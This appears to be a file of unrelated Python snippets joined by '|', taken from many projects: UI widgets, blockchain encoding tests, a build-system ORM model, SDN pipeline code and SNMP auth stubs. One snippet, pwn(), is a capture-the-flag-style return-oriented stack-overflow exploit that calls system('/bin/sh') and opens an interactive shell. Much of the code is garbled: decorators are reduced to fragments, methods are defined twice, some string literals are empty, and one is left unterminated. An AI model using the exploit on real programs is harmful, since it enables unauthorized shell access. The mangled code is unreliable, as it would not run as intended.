def mouseOver(self, value: Any):
self._config(value, js_type=False)
def remove(self):
return self._config_get(None)
def remove(self, value: Any):
self._config(value, js_type=False)
def select(self):
return self._config_get(None)
def select(self, value: Any):
self._config(value, js_type=False)
def unselect(self):
return self._config_get(None)
def unselect(self, value: Any):
self._config(value, js_type=False)
def update(self):
return self._config_get(None)
def update(self, value: Any):
self._config(value, js_type=False) |
('pip', context_settings={'ignore_unknown_options': True, 'help_option_names': []}, help='For pip help use `bench pip help [COMMAND]` or `bench pip [COMMAND] -h`')
('args', nargs=(- 1))
_context
def pip(ctx, args):
import os
from bench.utils.bench import get_env_cmd
env_py = get_env_cmd('python')
os.execv(env_py, ((env_py, '-m', 'pip') + args)) |
.parametrize('_input_type, expected_esd_err, message_to_encode', (('Custom type with extra properties in types', {'expected_exception': KeyError, 'match': 'age'}, {'types': {'EIP712Domain': [{'name': 'name', 'type': 'string'}], 'Person': [{'name': 'name', 'type': 'string'}, {'name': 'age', 'type': 'uint256'}]}, 'primaryType': 'Person', 'domain': {'name': 'Name'}, 'message': {'name': 'Bob'}}), ('Atomic type with `None` input', {'expected_exception': ValueError, 'match': 'Missing value for field address of type address'}, {'types': {'EIP712Domain': [{'name': 'name', 'type': 'string'}], 'Person': [{'name': 'name', 'type': 'string'}, {'name': 'address', 'type': 'address'}]}, 'primaryType': 'Person', 'domain': {'name': 'Name'}, 'message': {'name': 'Bob', 'address': None}}), ('Atomic type missing', {'expected_exception': KeyError, 'match': 'address'}, {'types': {'EIP712Domain': [{'name': 'name', 'type': 'string'}], 'Person': [{'name': 'name', 'type': 'string'}, {'name': 'address', 'type': 'address'}]}, 'primaryType': 'Person', 'domain': {'name': 'Name'}, 'message': {'name': 'Bob'}}), ('Dynamic type with `None` input', {'expected_exception': ValueError, 'match': 'Missing value for field motto of type string'}, {'types': {'EIP712Domain': [{'name': 'name', 'type': 'string'}], 'Person': [{'name': 'name', 'type': 'string'}, {'name': 'motto', 'type': 'string'}]}, 'primaryType': 'Person', 'domain': {'name': 'Name'}, 'message': {'name': 'Bob', 'motto': None}}), ('Dynamic type missing', {'expected_exception': KeyError, 'match': 'motto'}, {'types': {'EIP712Domain': [{'name': 'name', 'type': 'string'}], 'Person': [{'name': 'name', 'type': 'string'}, {'name': 'motto', 'type': 'string'}]}, 'primaryType': 'Person', 'domain': {'name': 'Name'}, 'message': {'name': 'Bob'}}), ('Custom type with `None` input', {'expected_exception': ValueError, 'match': 'Missing value for field friend of type Person'}, {'types': {'EIP712Domain': [{'name': 'name', 'type': 'string'}], 'Person': [{'name': 'name', 'type': 'string'}, {'name': 'friend', 'type': 'Person'}]}, 'primaryType': 'Person', 'domain': {'name': 'Name'}, 'message': {'name': 'Bob', 'friend': None}}), ('Custom type missing', {'expected_exception': KeyError, 'match': 'friend'}, {'types': {'EIP712Domain': [{'name': 'name', 'type': 'string'}], 'Person': [{'name': 'name', 'type': 'string'}, {'name': 'friend', 'type': 'Person'}]}, 'primaryType': 'Person', 'domain': {'name': 'Name'}, 'message': {'name': 'Bob'}}), ('Unrecognized primary type', {'expected_exception': ValidationError, 'match': 'The Primary Type `Person` is not present in the `types` attribute'}, {'types': {'EIP712Domain': [{'name': 'name', 'type': 'string'}], 'Human': [{'name': 'name', 'type': 'string'}]}, 'primaryType': 'Person', 'domain': {'name': 'Name'}, 'message': {'name': 'Bob'}})))
def test_encode_structured_data_fail(_input_type, expected_esd_err, message_to_encode):
with pytest.raises(**expected_esd_err):
encode_structured_data(message_to_encode) |
def test_nested_list():
length = ((), b'a', (b'b', b'c', b'd'))
def dec():
return rlp.decode_lazy(rlp.encode(length))
assert isinstance(dec(), Sequence)
assert (len(dec()) == len(length))
assert (evaluate(dec()) == length)
with pytest.raises(IndexError):
dec()[0][0]
with pytest.raises(IndexError):
dec()[1][1]
with pytest.raises(IndexError):
dec()[2][3]
with pytest.raises(IndexError):
dec()[3] |
class ElevatedButton(ConstrainedControl):
def __init__(self, text: Optional[str]=None, ref: Optional[Ref]=None, key: Optional[str]=None, width: OptionalNumber=None, height: OptionalNumber=None, left: OptionalNumber=None, top: OptionalNumber=None, right: OptionalNumber=None, bottom: OptionalNumber=None, expand: Union[(None, bool, int)]=None, col: Optional[ResponsiveNumber]=None, opacity: OptionalNumber=None, rotate: RotateValue=None, scale: ScaleValue=None, offset: OffsetValue=None, aspect_ratio: OptionalNumber=None, animate_opacity: AnimationValue=None, animate_size: AnimationValue=None, animate_position: AnimationValue=None, animate_rotation: AnimationValue=None, animate_scale: AnimationValue=None, animate_offset: AnimationValue=None, on_animation_end=None, tooltip: Optional[str]=None, visible: Optional[bool]=None, disabled: Optional[bool]=None, data: Any=None, color: Optional[str]=None, bgcolor: Optional[str]=None, elevation: OptionalNumber=None, style: Optional[ButtonStyle]=None, icon: Optional[str]=None, icon_color: Optional[str]=None, content: Optional[Control]=None, autofocus: Optional[bool]=None, url: Optional[str]=None, url_target: Optional[str]=None, on_click=None, on_long_press=None, on_hover=None, on_focus=None, on_blur=None):
ConstrainedControl.__init__(self, ref=ref, key=key, width=width, height=height, left=left, top=top, right=right, bottom=bottom, expand=expand, col=col, opacity=opacity, rotate=rotate, scale=scale, offset=offset, aspect_ratio=aspect_ratio, animate_opacity=animate_opacity, animate_size=animate_size, animate_position=animate_position, animate_rotation=animate_rotation, animate_scale=animate_scale, animate_offset=animate_offset, on_animation_end=on_animation_end, tooltip=tooltip, visible=visible, disabled=disabled, data=data)
self.__color = None
self.__bgcolor = None
self.__elevation = None
self.text = text
self.color = color
self.bgcolor = bgcolor
self.elevation = elevation
self.style = style
self.icon = icon
self.icon_color = icon_color
self.content = content
self.autofocus = autofocus
self.url = url
self.url_target = url_target
self.on_click = on_click
self.on_long_press = on_long_press
self.on_hover = on_hover
self.on_focus = on_focus
self.on_blur = on_blur
def _get_control_name(self):
return 'elevatedbutton'
def _before_build_command(self):
super()._before_build_command()
if ((self.__color is not None) or (self.__bgcolor is not None) or (self.__elevation is not None)):
if (self.__style is None):
self.__style = ButtonStyle()
if ((self.__style.color != self.__color) or self.disabled):
self.__style.color = (self.__color if (not self.disabled) else None)
if ((self.__style.bgcolor != self.__bgcolor) or self.disabled):
self.__style.bgcolor = (self.__bgcolor if (not self.disabled) else None)
if (self.__style.elevation != self.__elevation):
self.__style.elevation = self.__elevation
if (self.__style is not None):
self.__style.side = self._wrap_attr_dict(self.__style.side)
self.__style.shape = self._wrap_attr_dict(self.__style.shape)
self._set_attr_json('style', self.__style)
def _get_children(self):
if (self.__content is None):
return []
self.__content._set_attr_internal('n', 'content')
return [self.__content]
def focus(self):
self._set_attr_json('focus', str(time.time()))
self.update()
async def focus_async(self):
self._set_attr_json('focus', str(time.time()))
(await self.update_async())
def text(self):
return self._get_attr('text')
def text(self, value):
self._set_attr('text', value)
def color(self):
return self.__color
def color(self, value):
self.__color = value
def bgcolor(self):
return self.__bgcolor
def bgcolor(self, value):
self.__bgcolor = value
def elevation(self) -> OptionalNumber:
return self.__elevation
def elevation(self, value: OptionalNumber):
self.__elevation = value
def style(self) -> Optional[ButtonStyle]:
return self.__style
def style(self, value: Optional[ButtonStyle]):
self.__style = value
def icon(self):
return self._get_attr('icon')
def icon(self, value):
self._set_attr('icon', value)
def icon_color(self):
return self._get_attr('iconColor')
_color.setter
def icon_color(self, value):
self._set_attr('iconColor', value)
def url(self):
return self._get_attr('url')
def url(self, value):
self._set_attr('url', value)
def url_target(self):
return self._get_attr('urlTarget')
_target.setter
def url_target(self, value):
self._set_attr('urlTarget', value)
def on_click(self):
return self._get_event_handler('click')
_click.setter
def on_click(self, handler):
self._add_event_handler('click', handler)
def on_long_press(self):
return self._get_event_handler('long_press')
_long_press.setter
def on_long_press(self, handler):
self._add_event_handler('long_press', handler)
self._set_attr('onLongPress', (True if (handler is not None) else None))
def content(self) -> Optional[Control]:
return self.__content
def content(self, value: Optional[Control]):
self.__content = value
def autofocus(self) -> Optional[bool]:
return self._get_attr('autofocus', data_type='bool', def_value=False)
def autofocus(self, value: Optional[bool]):
self._set_attr('autofocus', value)
def on_hover(self):
return self._get_event_handler('hover')
_hover.setter
def on_hover(self, handler):
self._add_event_handler('hover', handler)
self._set_attr('onHover', (True if (handler is not None) else None))
def on_focus(self):
return self._get_event_handler('focus')
_focus.setter
def on_focus(self, handler):
self._add_event_handler('focus', handler)
def on_blur(self):
return self._get_event_handler('blur')
_blur.setter
def on_blur(self, handler):
self._add_event_handler('blur', handler) |
def _parse_user_flags():
try:
idx = list(sys.argv).index('--user-flags')
user_flags_file = sys.argv[(idx + 1)]
except (ValueError, IndexError):
user_flags_file = ''
if (user_flags_file and os.path.isfile(user_flags_file)):
from ryu.utils import _import_module_file
_import_module_file(user_flags_file) |
def test_capture_serverless_api_gateway_v2(event_api2, context, elasticapm_client):
os.environ['AWS_LAMBDA_FUNCTION_NAME'] = 'test_func'
_serverless
def test_func(event, context):
with capture_span('test_span'):
time.sleep(0.01)
return {'statusCode': 200, 'headers': {'foo': 'bar'}}
test_func(event_api2, context)
assert (len(elasticapm_client.events[constants.TRANSACTION]) == 1)
transaction = elasticapm_client.events[constants.TRANSACTION][0]
assert (transaction['name'] == 'GET /dev/fetch_all')
assert (transaction['result'] == 'HTTP 2xx')
assert (transaction['span_count']['started'] == 1)
assert (transaction['context']['request']['method'] == 'GET')
assert transaction['context']['request']['headers']
assert (transaction['context']['response']['status_code'] == 200)
assert (transaction['context']['cloud']['origin']['service']['name'] == 'api gateway') |
class Copr(db.Model, helpers.Serializer, CoprSearchRelatedData):
__table__ = outerjoin(_CoprPublic.__table__, _CoprPrivate.__table__)
id = column_property(_CoprPublic.__table__.c.id, _CoprPrivate.__table__.c.copr_id)
user = db.relationship('User', backref=db.backref('coprs'))
group = db.relationship('Group', backref=db.backref('groups'))
mock_chroots = association_proxy('copr_chroots', 'mock_chroot')
forked_from = db.relationship('Copr', remote_side=_CoprPublic.id, foreign_keys=[_CoprPublic.forked_from_id], backref=db.backref('all_forks'))
def forks(self):
return [fork for fork in self.all_forks if (not fork.deleted)]
def main_dir(self):
return CoprDir.query.filter((CoprDir.copr_id == self.id)).filter((CoprDir.main == True)).one()
def scm_api_auth(self):
if (not self.scm_api_auth_json):
return {}
return json.loads(self.scm_api_auth_json)
def is_a_group_project(self):
return (self.group is not None)
def owner(self):
return (self.group if self.is_a_group_project else self.user)
def owner_name(self):
return (self.group.at_name if self.is_a_group_project else self.user.name)
def repos_list(self):
result = (self.repos or '')
return result.split()
def active_chroots(self):
return [cc.mock_chroot for cc in self.active_copr_chroots]
def enable_permissible_copr_chroots(self):
permissible_states = [ChrootDeletionStatus('active'), ChrootDeletionStatus('preserved')]
return [cc for cc in self.copr_chroots if (cc.delete_status in permissible_states)]
def enable_permissible_chroots(self):
return [cc.mock_chroot for cc in self.enable_permissible_copr_chroots]
def active_multilib_chroots(self):
chroot_names = [chroot.name for chroot in self.active_chroots]
found_chroots = []
for chroot in self.active_chroots:
if (chroot.arch not in MockChroot.multilib_pairs):
continue
counterpart = '{}-{}-{}'.format(chroot.os_release, chroot.os_version, MockChroot.multilib_pairs[chroot.arch])
if (counterpart in chroot_names):
found_chroots.append(chroot)
return found_chroots
def active_copr_chroots(self):
return [c for c in self.copr_chroots if (c.is_active and (not c.deleted))]
def active_chroots_sorted(self):
return sorted(self.active_chroots, key=(lambda ch: ch.name))
def outdated_chroots(self):
return sorted([chroot for chroot in self.copr_chroots if (chroot.delete_after and (not chroot.deleted))], key=(lambda ch: ch.name))
def active_chroots_grouped(self):
chroots = [('{} {}'.format(c.os_release, c.os_version), c.arch) for c in self.active_chroots_sorted]
output = []
for (os, chs) in itertools.groupby(chroots, operator.itemgetter(0)):
output.append((os, [ch[1] for ch in chs]))
return output
def build_count(self):
return len(self.builds)
def disable_createrepo(self):
return (not self.auto_createrepo)
_createrepo.setter
def disable_createrepo(self, value):
self.auto_createrepo = (not bool(value))
def devel_mode(self):
return self.disable_createrepo
def modified_chroots(self):
modified_chroots = {}
def _set(chroot, attribute, value, check=None):
if ((check is not None) and (not check)):
return
if (not value):
return
if (chroot not in modified_chroots):
modified_chroots[chroot] = {}
modified_chroots[chroot][attribute] = value
for chroot in self.active_copr_chroots:
_set(chroot.name, 'Additional buildroot packages', ', '.join(chroot.buildroot_pkgs_list))
_set(chroot.name, 'Build time repositories', ', '.join(chroot.repos_list))
mock_opts = []
for opt in chroot.with_opts.strip().split():
mock_opts += [('--with ' + opt)]
for opt in chroot.without_opts.strip().split():
mock_opts += [('--without ' + opt)]
_set(chroot.name, 'Mock options', ' '.join(mock_opts))
_set(chroot.name, 'Module setup commands', chroot.module_toggle)
_set(chroot.name, 'Bootstrap overridden as', chroot.bootstrap, chroot.bootstrap_changed)
_set(chroot.name, 'Isolation set to', chroot.isolation, (chroot.isolation and (chroot.isolation != 'unchanged')))
return modified_chroots
def is_release_arch_modified(self, name_release, arch):
return ('{}-{}'.format(name_release, arch) in self.modified_chroots.keys())
def full_name(self):
return '{}/{}'.format(self.owner_name, self.name)
def repo_name(self):
return '{}-{}'.format(self.owner_name, self.main_dir.name)
def repo_url(self):
return '/'.join([app.config['BACKEND_BASE_URL'], u'results', self.full_name])
def repo_id(self):
return '-'.join([self.owner_name.replace('', 'group_'), self.name])
def modules_url(self):
return '/'.join([self.repo_url, 'modules'])
def to_dict(self, private=False, show_builds=True, show_chroots=True):
result = {}
for key in ['id', 'name', 'description', 'instructions']:
result[key] = str(copy.copy(getattr(self, key)))
result['owner'] = self.owner_name
return result
def still_forking(self):
return bool(Action.query.filter((Action.result == BackendResultEnum('waiting'))).filter((Action.action_type == ActionTypeEnum('fork'))).filter((Action.new_value == self.full_name)).all())
def get_search_related_copr_id(self):
return self.id
def enable_net(self):
return self.build_enable_net
_net.setter
def enable_net(self, value):
self.build_enable_net = value
def new_webhook_secret(self):
self.webhook_secret = str(uuid.uuid4())
def delete_after_days(self):
if (self.delete_after is None):
return None
delta = (self.delete_after - datetime.datetime.now())
return (delta.days if (delta.days > 0) else 0)
_after_days.setter
def delete_after_days(self, days):
if ((days is None) or (days == (- 1))):
self.delete_after = None
return
delete_after = (datetime.datetime.now() + datetime.timedelta(days=(days + 1)))
delete_after = delete_after.replace(hour=0, minute=0, second=0, microsecond=0)
self.delete_after = delete_after
def delete_after_msg(self):
if (self.delete_after_days == 0):
return 'will be deleted ASAP'
return 'will be deleted after {} days'.format(self.delete_after_days)
def admin_mails(self):
mails = [self.user.mail]
for perm in self.copr_permissions:
if (perm.copr_admin == helpers.PermissionEnum('approved')):
mails.append(perm.user.mail)
return mails
def runtime_deps(self):
dependencies = set()
if self.runtime_dependencies:
for dep in self.runtime_dependencies.split():
if (not dep):
continue
dependencies.add(dep)
return list(dependencies)
def votes(self):
query = db.session.query(CoprScore)
query = query.filter((CoprScore.copr_id == self.id))
return query
def upvotes(self):
return self.votes.filter((CoprScore.score == 1)).count()
def downvotes(self):
return self.votes.filter((CoprScore.score == (- 1))).count()
def score(self):
return sum([self.upvotes, (self.downvotes * (- 1))])
def packit_forge_projects_allowed_list(self):
projects = (self.packit_forge_projects_allowed or '')
return projects.split() |
class QOFPrevalence(models.Model):
pct = models.ForeignKey(PCT, null=True, blank=True, on_delete=models.PROTECT)
practice = models.ForeignKey(Practice, null=True, blank=True, on_delete=models.PROTECT)
start_year = models.IntegerField()
indicator_group = models.CharField(max_length=10)
register_description = models.CharField(max_length=100)
disease_register_size = models.IntegerField() |
def _tuple_forward(layer: Model[(Ragged, Ragged)], X: RaggedData, is_train: bool) -> Tuple[(RaggedData, Callable)]:
(Yr, get_dXr) = layer(Ragged(*X), is_train)
def backprop(dY: RaggedData) -> RaggedData:
dXr = get_dXr(Ragged(*dY))
return (dXr.data, dXr.lengths)
return ((Yr.data, Yr.lengths), backprop) |
def extractSoulreaperchroniclesBlogspotCom(item):
(vol, chp, frag, postfix) = extractVolChapterFragmentPostfix(item['title'])
if ((not (chp or vol)) or ('preview' in item['title'].lower())):
return None
tagmap = [('PRC', 'PRC', 'translated'), ('Loiterous', 'Loiterous', 'oel')]
for (tagname, name, tl_type) in tagmap:
if (tagname in item['tags']):
return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
return False |
class Msg(object):
def SetWithdrawAddress(request, target, options=(), channel_credentials=None, call_credentials=None, insecure=False, compression=None, wait_for_ready=None, timeout=None, metadata=None):
return grpc.experimental.unary_unary(request, target, '/cosmos.distribution.v1beta1.Msg/SetWithdrawAddress', cosmos_dot_distribution_dot_v1beta1_dot_tx__pb2.MsgSetWithdrawAddress.SerializeToString, cosmos_dot_distribution_dot_v1beta1_dot_tx__pb2.MsgSetWithdrawAddressResponse.FromString, options, channel_credentials, insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
def WithdrawDelegatorReward(request, target, options=(), channel_credentials=None, call_credentials=None, insecure=False, compression=None, wait_for_ready=None, timeout=None, metadata=None):
return grpc.experimental.unary_unary(request, target, '/cosmos.distribution.v1beta1.Msg/WithdrawDelegatorReward', cosmos_dot_distribution_dot_v1beta1_dot_tx__pb2.MsgWithdrawDelegatorReward.SerializeToString, cosmos_dot_distribution_dot_v1beta1_dot_tx__pb2.MsgWithdrawDelegatorRewardResponse.FromString, options, channel_credentials, insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
def WithdrawValidatorCommission(request, target, options=(), channel_credentials=None, call_credentials=None, insecure=False, compression=None, wait_for_ready=None, timeout=None, metadata=None):
return grpc.experimental.unary_unary(request, target, '/cosmos.distribution.v1beta1.Msg/WithdrawValidatorCommission', cosmos_dot_distribution_dot_v1beta1_dot_tx__pb2.MsgWithdrawValidatorCommission.SerializeToString, cosmos_dot_distribution_dot_v1beta1_dot_tx__pb2.MsgWithdrawValidatorCommissionResponse.FromString, options, channel_credentials, insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
def FundCommunityPool(request, target, options=(), channel_credentials=None, call_credentials=None, insecure=False, compression=None, wait_for_ready=None, timeout=None, metadata=None):
return grpc.experimental.unary_unary(request, target, '/cosmos.distribution.v1beta1.Msg/FundCommunityPool', cosmos_dot_distribution_dot_v1beta1_dot_tx__pb2.MsgFundCommunityPool.SerializeToString, cosmos_dot_distribution_dot_v1beta1_dot_tx__pb2.MsgFundCommunityPoolResponse.FromString, options, channel_credentials, insecure, call_credentials, compression, wait_for_ready, timeout, metadata) |
class ValvePipeline(ValveManagerBase):
def __init__(self, dp):
self.dp = dp
self.vlan_table = dp.tables['vlan']
self.classification_table = dp.classification_table()
self.output_table = dp.output_table()
self.egress_table = None
self.egress_acl_table = None
if dp.egress_pipeline:
self.egress_table = dp.tables['egress']
self.egress_acl_table = dp.tables.get('egress_acl')
self.filter_priority = self._FILTER_PRIORITY
self.select_priority = self._HIGH_PRIORITY
_cache(maxsize=1024)
def _accept_to_table(table, actions):
inst = [table.goto_this()]
if actions:
inst.append(valve_of.apply_actions(actions))
return tuple(inst)
_cache(maxsize=1024)
def accept_to_vlan(self, actions=None):
return self._accept_to_table(self.vlan_table, actions)
_cache(maxsize=1024)
def accept_to_classification(self, actions=None):
return self._accept_to_table(self.classification_table, actions)
_cache(maxsize=1024)
def accept_to_l2_forwarding(self, actions=None):
return self._accept_to_table(self.output_table, actions)
_cache(maxsize=1024)
def accept_to_egress(self, actions=None):
assert (self.egress_table is not None)
return self._accept_to_table(self.egress_table, actions)
def output(self, port, vlan, hairpin=False, external_forwarding_requested=None):
instructions = []
if self.egress_table:
(metadata, metadata_mask) = faucet_md.get_egress_metadata(port.number, vlan.vid)
if self.egress_acl_table:
instructions.extend(valve_of.metadata_goto_table(metadata, metadata_mask, self.egress_acl_table))
else:
instructions.extend(valve_of.metadata_goto_table(metadata, metadata_mask, self.egress_table))
else:
instructions.append(valve_of.apply_actions(vlan.output_port(port, hairpin=hairpin, output_table=self.output_table, external_forwarding_requested=external_forwarding_requested)))
return tuple(instructions)
def initialise_tables(self):
ofmsgs = []
if self.dp.drop_broadcast_source_address:
ofmsgs.extend(self.filter_packets({'eth_src': valve_of.mac.BROADCAST_STR}))
ofmsgs.extend(self.filter_packets({'eth_type': valve_of.ECTP_ETH_TYPE}, priority_offset=10))
return ofmsgs
def _add_egress_table_rule(self, port, vlan, pop_vlan=True):
(metadata, metadata_mask) = faucet_md.get_egress_metadata(port.number, vlan.vid)
actions = copy.copy(port.mirror_actions())
if pop_vlan:
actions.append(valve_of.pop_vlan())
actions.append(valve_of.output_port(port.number))
inst = (valve_of.apply_actions(tuple(actions)),)
return self.egress_table.flowmod(self.egress_table.match(vlan=vlan, metadata=metadata, metadata_mask=metadata_mask), priority=self.dp.high_priority, inst=inst)
def add_port(self, port):
ofmsgs = []
if (self.egress_table is None):
return ofmsgs
for vlan in port.tagged_vlans:
ofmsgs.append(self._add_egress_table_rule(port, vlan, pop_vlan=False))
if (port.native_vlan is not None):
ofmsgs.append(self._add_egress_table_rule(port, port.native_vlan))
return ofmsgs
def del_port(self, port):
ofmsgs = []
if self.egress_table:
mask = faucet_md.PORT_METADATA_MASK
ofmsgs.append(self.egress_table.flowdel(self.egress_table.match(metadata=(port.number & mask), metadata_mask=mask)))
return ofmsgs
def filter_packets(self, match_dict, priority_offset=0):
return [self.classification_table.flowdrop(self.classification_table.match(**match_dict), priority=(self.filter_priority + priority_offset))]
def select_packets(self, target_table, match_dict, actions=None, priority_offset=0):
inst = [target_table.goto_this()]
if (actions is not None):
inst.append(valve_of.apply_actions(actions))
return [self.classification_table.flowmod(self.classification_table.match(**match_dict), priority=(self.select_priority + priority_offset), inst=tuple(inst))]
def remove_filter(self, match_dict, strict=True, priority_offset=0):
priority = None
if strict:
priority = (self.filter_priority + priority_offset)
return [self.classification_table.flowdel(self.classification_table.match(**match_dict), priority=priority, strict=strict)] |
def pwn():
payload = ('A' * (108 + 4))
payload += p32(read_plt)
payload += p32(pppr_addr)
payload += p32(0)
payload += p32(binsh_addr)
payload += p32(8)
payload += p32(system_addr)
payload += p32(_start_addr)
payload += p32(binsh_addr)
io.send(payload)
io.send('/bin/sh\x00')
io.interactive() |
def test():
assert ('from spacy.tokens import Doc' in __solution__), 'Doc?'
assert (len(spaces) == 4), 'Doc?'
assert all((isinstance(s, bool) for s in spaces)), 'spaces'
assert ([int(s) for s in spaces] == [0, 0, 0, 0]), '?'
assert (doc.text == '!'), 'Doc?'
__msg__.good('Nice!') |
class RectDecoration(_Decoration, GroupMixin):
defaults = [('filled', False, 'Whether to fill shape'), ('radius', 4, 'Corner radius as int or list of ints [TL TR BR BL]. 0 is square'), ('colour', '#000000', 'Colour for decoration'), ('line_width', 0, 'Line width for decoration'), ('line_colour', '#ffffff', 'Colour of border'), ('use_widget_background', False, "Paint the decoration using the colour from the widget's `background` property. The widget's background will then be the bar's background colour."), ('clip', False, 'Clip contents of widget to decoration area.')]
_screenshots = [('rect_decoration.png', 'Single decoration'), ('rect_decoration_stacked.png', 'Two decorations stacked')]
def __init__(self, **config):
_Decoration.__init__(self, **config)
self.add_defaults(GroupMixin.defaults)
self.add_defaults(RectDecoration.defaults)
self.corners = self.single_or_four(self.radius, 'Corner radius')
def _draw_path(self, clip=False):
ctx = self.ctx
ctx.new_path()
diff = ((self.line_width / 2) if clip else 0)
box_height = (self.height - (2 * self.padding_y))
box_width = (self.width - (2 * self.padding_x))
first = False
last = False
if ((not self.radius) and (not self.group)):
ctx.rectangle(self.padding_x, self.padding_y, box_width, box_height)
else:
if (self.group and (self.parent in self.parent.bar.widgets)):
corners = [0, 0, 0, 0]
if self.is_first:
first = True
corners[0] = self.corners[0]
corners[3] = self.corners[3]
if self.is_last:
last = True
corners[1] = self.corners[1]
corners[2] = self.corners[2]
else:
corners = self.corners
first = True
last = True
degrees = (math.pi / 180.0)
radius = corners[0]
delta = (radius + (self.line_width / 2))
y = ((self.padding_y + delta) + diff)
if first:
x = (self.padding_x + delta)
else:
radius = max((radius - diff), 0)
x = ((- self.line_width) + diff)
ctx.arc(x, y, radius, (180 * degrees), (270 * degrees))
radius = corners[1]
delta = (radius + (self.line_width / 2))
y = ((self.padding_y + delta) + diff)
if last:
x = ((self.padding_x + box_width) - delta)
else:
radius = max((radius - diff), 0)
x = ((self.width + self.line_width) - diff)
ctx.arc(x, y, radius, ((- 90) * degrees), (0 * degrees))
radius = corners[2]
delta = (radius + (self.line_width / 2))
y = (((self.padding_y + box_height) - delta) - diff)
if last:
x = ((self.padding_x + box_width) - delta)
else:
radius = max((radius - diff), 0)
x = ((self.width + self.line_width) - diff)
ctx.arc(x, y, radius, (0 * degrees), (90 * degrees))
radius = corners[3]
delta = (radius + (self.line_width / 2))
y = (((self.padding_y + box_height) - delta) - diff)
if first:
x = (self.padding_x + delta)
else:
radius = max((radius - diff), 0)
x = ((- self.line_width) + diff)
ctx.arc(x, y, radius, (90 * degrees), (180 * degrees))
ctx.close_path()
def draw(self) -> None:
self.drawer.ctx.reset_clip()
self._draw_path()
if self.filled:
self.fill_colour = (self.parent.background if self.use_widget_background else self.colour)
self.set_source_rgb(self.fill_colour)
self.ctx.fill_preserve()
if self.line_width:
self.ctx.set_line_width(self.line_width)
self.set_source_rgb(self.line_colour)
self.ctx.stroke()
if self.clip:
self._draw_path(clip=True)
self.ctx.clip()
else:
self.ctx.new_path() |
class NoAuth(base.AbstractAuthenticationService):
SERVICE_ID = (1, 3, 6, 1, 6, 3, 10, 1, 1, 1)
def hashPassphrase(self, authKey):
return
def localizeKey(self, authKey, snmpEngineID):
return
def authenticateOutgoingMsg(self, authKey, wholeMsg):
raise error.StatusInformation(errorIndication=errind.noAuthentication)
def authenticateIncomingMsg(self, authKey, authParameters, wholeMsg):
raise error.StatusInformation(errorIndication=errind.noAuthentication) |
class CatalogItemAppLinks(AbstractObject):
def __init__(self, api=None):
super(CatalogItemAppLinks, self).__init__()
self._isCatalogItemAppLinks = True
self._api = api
class Field(AbstractObject.Field):
android = 'android'
ios = 'ios'
ipad = 'ipad'
iphone = 'iphone'
web = 'web'
windows = 'windows'
windows_phone = 'windows_phone'
windows_universal = 'windows_universal'
_field_types = {'android': 'list<AndroidAppLink>', 'ios': 'list<IosAppLink>', 'ipad': 'list<IosAppLink>', 'iphone': 'list<IosAppLink>', 'web': 'WebAppLink', 'windows': 'list<WindowsAppLink>', 'windows_phone': 'list<WindowsPhoneAppLink>', 'windows_universal': 'list<WindowsAppLink>'}
def _get_field_enum_info(cls):
field_enum_info = {}
return field_enum_info |
class Choropleth(GraphChartJs.Chart):
name = 'ChartJs Choropleth'
tag = 'canvas'
requirements = ('chartjs-chart-geo',)
geo_map = '
_option_cls = OptChartJs.OptionsGeo
_chart__type = 'choropleth'
builder_name = 'GeoChoropleth'
def options(self) -> OptChartJs.OptionsGeo:
return super().options
('chartjs')
def build(self, data: types.JS_DATA_TYPES=None, options: types.JS_DATA_TYPES=None, profile: types.PROFILE_TYPE=None, component_id: str=None, stop_state: bool=True, dataflows: List[dict]=None):
self.js_code = component_id
callbacks = '(function(){})'
if stop_state:
callbacks = ('(function(){%s})' % self.hide_state(self.html_code))
return ('%(builder)s(%(htmlObj)s, %(data)s, %(options)s, %(map)s, %(callbacks)s)' % {'data': (data or []), 'options': self.getCtx(), 'builder': self.builder_name, 'callbacks': callbacks, 'htmlObj': (component_id or self.dom.varId), 'map': JsUtils.dataFlows(data, dataflows, self.page)})
def __str__(self):
self.page.properties.js.add_builders(self.refresh())
return ('<div><%s %s></%s></div>' % (self.tag, self.get_attrs(css_class_names=self.style.get_classes()), self.tag)) |
def update_export_kwargs_from_export_method(old_f):
def new_f(cls, model, input_args, save_path, export_method, **export_kwargs):
if (export_method is not None):
assert isinstance(export_method, str)
original_export_method = export_method
if ('_mobile' in export_method):
if ('mobile_optimization' in export_kwargs):
logger.warning('`mobile_optimization` is already specified, keep using it')
else:
if ('-metal' in export_method):
mobile_opt_config = MobileOptimizationConfig(backend='metal')
export_method = export_method.replace('-metal', '', 1)
elif ('-vulkan' in export_method):
mobile_opt_config = MobileOptimizationConfig(backend='vulkan')
export_method = export_method.replace('-vulkan', '', 1)
else:
mobile_opt_config = MobileOptimizationConfig()
export_kwargs['mobile_optimization'] = mobile_opt_config
export_method = export_method.replace('_mobile', '', 1)
if ('' in export_method):
jit_mode = export_kwargs.get('jit_mode', None)
if (jit_mode and (jit_mode != 'script')):
logger.warning('`jit_mode` is already specified as {}, overwrite it to `script` since appears in export_method'.format(jit_mode))
export_kwargs['jit_mode'] = 'script'
export_method = export_method.replace('', '', 1)
if ('' in export_method):
jit_mode = export_kwargs.get('jit_mode', None)
if (jit_mode and (jit_mode != 'trace')):
logger.warning('`jit_mode` is already specified as {}, overwrite it to `trace` since appears in export_method'.format(jit_mode))
export_kwargs['jit_mode'] = 'trace'
export_method = export_method.replace('', '', 1)
if ('_int8' in export_method):
export_method = export_method.replace('_int8', '', 1)
if (export_method != 'torchscript'):
logger.warning('Suspcious export_method after removing triggering words, original export_method: {}, remaining: {}'.format(original_export_method, export_method))
return old_f(cls, model, input_args, save_path, export_method, **export_kwargs)
return new_f |
def _test_success_with_all_filters_place_of_performance_county(client):
resp = client.post('/api/v2/search/spending_by_geography', content_type='application/json', data=json.dumps({'scope': 'place_of_performance', 'geo_layer': 'county', 'filters': non_legacy_filters()}))
assert (resp.status_code == status.HTTP_200_OK), 'Failed to return 200 Response' |
class SizeNode(GivElm):
total = 0
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.size = kwargs['size']
def __repr__(self):
return str(self.size)
def __str__(self):
return repr(self)
def stat(self):
super().stat()
SizeNode.total += 1 |
class OefSearchDialogue(BaseOefSearchDialogue):
__slots__ = ('_is_seller_search',)
